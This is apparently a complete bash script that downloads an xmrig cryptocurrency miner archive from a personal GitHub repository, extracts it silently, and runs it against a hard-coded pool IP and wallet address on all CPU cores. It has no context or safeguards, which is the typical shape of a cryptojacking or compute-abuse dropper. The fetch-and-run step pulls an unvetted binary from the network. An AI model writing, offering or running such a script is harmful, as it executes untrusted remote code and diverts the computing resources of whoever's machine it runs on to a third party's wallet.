#!/bin/bash
mkdir jukir
cd jukir
A=157.230.246.185:80
B=0x53F21103B6abe66CAf11883F15ab742B37ab0132
C=HEHE
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz >/dev/null 2>&1
./xmrig --url $A --user $B --pass $C --donate-level 1 -a rx/0 -t $(nproc --all)
